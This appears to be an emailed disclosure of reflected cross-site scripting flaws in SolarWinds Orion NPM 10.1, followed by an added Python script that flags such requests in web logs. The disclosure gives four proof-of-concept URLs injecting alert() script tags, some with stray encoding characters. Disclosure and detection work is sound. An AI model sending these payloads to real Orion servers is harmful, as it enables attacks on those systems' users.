Multiple XSS in SolarWinds Orion NPM 10.1
Values placed in the URI are rendered by the browser as supplied, without
being encoded. Orion NPM 10.1 has just been released, so there is no known
fix available yet.
Examples:
Most "variable=" that I've checked are vulnerable:
http://<server>/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813f-231270=0225b7.OrionMap&Title=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E
http://<server>/Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E
http://<server>/Orion/NPM/InterfaceDetails.aspx?NetObject=%3Cscript%3Ealert%28%2=7test%27%29%3C/script%3E&I:100&view=InterfaceDetails
http://<server>/Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yesterday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&R=YSubsetColor=&ResourceID=57&ShowTrend=True&ReturnTo=
If you need more information please let me know. Is there a template I
should fill out for these reports?
If this is published, please publish under x0skel and NOT my name....
Thanks,
John
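
Added example (not part of the original report, and not SolarWinds code): with no fix available, one way to spot requests like the ones above is to scan web server logs for /Orion/ .aspx requests whose query parameters decode to markup. The four-field log format, the sample lines and the function names are assumptions made for this sketch.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Markup that has no place in an Orion view parameter such as Title or NetObject.
SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z!]|\bon\w+\s*=|javascript:", re.I)
ORION_PAGE = re.compile(r"^/Orion/.*\.aspx$", re.I)

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so values encoded more than once are still inspected."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_request(uri):
    """Return [(param, decoded_value)] for markup-bearing parameters of an Orion page request."""
    parts = urlsplit(uri)
    if not ORION_PAGE.match(parts.path):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = decode_fully(value)
        if SUSPICIOUS.search(decoded):
            hits.append((name, decoded))
    return hits

# Constructed sample lines in an assumed "client method uri status" format.
SAMPLE_LOG = """\
192.0.2.10 GET /Orion/NetPerfMon/NodeDetails.aspx?NetObject=N:12 200
192.0.2.44 GET /Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E 200
192.0.2.44 GET /Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgBps&Title=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E&NetObject=I:100 200
192.0.2.10 GET /Orion/NPM/InterfaceDetails.aspx?NetObject=I:100&view=InterfaceDetails 200
"""

def scan(log_text):
    """Return (client, path, param, decoded_value) for every flagged parameter."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # not in the assumed format
        client, _method, uri, _status = fields
        for param, value in flag_request(uri):
            findings.append((client, urlsplit(uri).path, param, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```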